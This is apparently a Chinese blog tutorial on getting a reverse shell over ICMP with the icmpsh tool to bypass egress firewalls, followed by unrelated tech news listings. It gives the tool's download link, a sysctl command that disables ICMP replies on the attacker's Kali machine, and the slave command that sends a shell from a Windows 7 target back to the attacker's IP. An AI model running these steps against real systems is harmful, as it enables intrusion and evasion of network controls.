利用icmp协议反弹shell

介绍

有时候,网络管理员使用各种各样的防火墙,对渗透测试是非常困难的,有种这样防火墙:一个允许已知的机器流量在端口和服务(入口过滤),并拥有强大的出口访问控制列表的设置。

当你已经拥有一台机器内部网络或者DMZ的一部分。他并非通过TCP来获得reverse shell的,所以不考虑绑定shell。

然而有关UDP,通常是一个DNS隧道或通过ICMP的渠道来获得一个reverse shell。而ICMP就是这个工具的重点。icmpsh是一个简单的 reverse ICMP shell,它分别用C(icmpsh-m.c)、Perl(icmpsh-m.pl)、Python(icmpsh_m.py)使win32.slave兼容原始POSIX。

它比其他类似的开源工具的主要优点是,它并不需要管理员权限就能运行到目标机器上。该工具简洁,方便和便于携带(跨平台)。

此脚本主要是针对windows的,他是一个C/S架构:slave(客户端)它是用C写的只能在windows上运行,master(服务器)是跨平台的,作者将C和Perl已经移植到Python上了。

利用

下载: https://github.com/inquisb/icmpsh

  • 靶机:win7
  • 攻击机:kali

先用这个命令关闭kali的icmp回显

sysctl -w net.ipv4.icmp_echo_ignore_all=1

运行icmp_m.py文件前面是kaliIP  后面是被攻击win7的ip

将icmp.exe上传到靶机

在实际渗透当中怎么上传icmp.exe看自己的思路,示例如下

  • 打开cmd命令,输入
icmpsh.exe -t 192.168.115.6 -d 500 -b 30 -s 128

  • kali成功接收到通过icmp反弹的shell


https://mp.weixin.qq.com/s/r-Mp2x4R-weLejzfQa0Dag

kkFileView

使用spring boot打造文件文档在线预览项目解决方案,支持doc、docx、ppt、pptx、xls、xlsx、zip、rar、mp4,mp3以及众多类文本如txt、html、xml、java、properties、sql、js、md、json、conf、ini、vue、php、py、bat、gitignore等文件在线预览

发布于:1天以前  |  23次阅读  |  详细内容 »

谷歌确认将推出新功能 对标苹果AirDrop

北京时间7月1日早间消息,据外媒报道,此前几个月中一直有传言称谷歌将为Android手机添加一个类似苹果AirDrop的新功能。如今,谷歌终于证实,他们的确将推出这个功能,其正式名称为“Nearby Share”。一些Android手机用户已经测试了该功能的beta版本。

发布于:8天以前  |  48次阅读  |  详细内容 »

老干妈回应:腾讯公司被骗了 并没有与腾讯有任何的合作

6月30日,中国裁判文书网显示,广东省深圳市南山区人民法院发布一则民事裁定书,同意原告腾讯请求查封、冻结被告老干妈公司公司名下价值人民币16240600元的财产。但6月30日下午,老干妈声明称,经核实,公司从未与腾讯或授权他人与腾讯就“老干妈”品牌签署《联合市场推广合作协议》,且从未与腾讯进行过任何商业合作。

发布于:8天以前  |  49次阅读  |  详细内容 »

移动端常见崩溃指标

崩溃分析,是将 Android 和 iOS 平台常见的 APP 崩溃问题进行归类分析,帮助企业根据崩溃指标快速发现、定位问题。

发布于:9天以前  |  114次阅读  |  详细内容 »

58同城一季度净利润16.386亿元,同比增134.7%

6月26日讯,生活服务平台58同城(NYSE:WUBA)公布了截至2020年3月31日第一季度未经审计的财务报告。财报显示,58同城第一季度实现营收25.603亿元,同比下滑15.5%;净利润16.386亿元,同比增134.7%。

发布于:12天以前  |  48次阅读  |  详细内容 »

马斯克豪宅以2900万美元出手,买家为网易CEO丁磊

6月20日早间消息,据《华尔街日报》周五援引公开记录报道,特斯拉首席执行官埃隆·马斯克(Elon Musk)以2900万美元的价格出售了他在洛杉矶Bel-Air地区的一处房屋。报道称,买家是与中国亿万富翁丁磊有联系的公司。

发布于:18天以前  |  82次阅读  |  详细内容 »

甲骨文公司泄露数十亿条网络数据记录

据外媒报道,科技巨头「甲骨文」的数据管理平台BlueKai因为在服务器上不加密码从而泄露了全球数十亿条数据记录。甲骨文发言人黛博拉·海林格(Deborah Hellinger)对媒体表示,该消息属实。

发布于:18天以前  |  74次阅读  |  详细内容 »

罗永浩:筹备脱口秀节目,正在组建团队

6月21日晚间消息,极客公园与哔哩哔哩联合举办的Rebuild2020科技全明星峰会上,罗永浩在对话中透露,自己准备在一个比较大的平台上做一档综艺节目,是一档脱口秀节目,当下正在组建团队。“做这一档节目不是为了赚钱。”罗永浩说。

发布于:18天以前  |  63次阅读  |  详细内容 »

最多阅读

Android插件化方案 1年以前  |  229965次阅读
SourceTree,让你忘掉Git命令的工具 1年以前  |  2140次阅读
朴素贝叶斯分类器的应用 1年以前  |  2032次阅读
在Python的Django框架中包装视图函数 1年以前  |  1843次阅读
Python贪吃蛇游戏编写代码 1年以前  |  1827次阅读
Google Shell 风格指南 1年以前  |  1755次阅读
Google Python 风格指南 1年以前  |  1654次阅读
Genymotion下载及安装使用 1年以前  |  1594次阅读
在Sublime中高亮显示Proto Buffer 1年以前  |  1587次阅读
Markdown语法 链接 1年以前  |  1555次阅读
Markdown语法 转义 1年以前  |  1551次阅读
Markdown语法 段落内代码 1年以前  |  1494次阅读
处理并发之一:LINUX Epoll机制介绍 1年以前  |  1400次阅读
Python基础之函数用法实例详解 1年以前  |  1393次阅读
Python写的一个简单DNS服务器实例 1年以前  |  1391次阅读
java中NIO与传统IO 1年以前  |  1373次阅读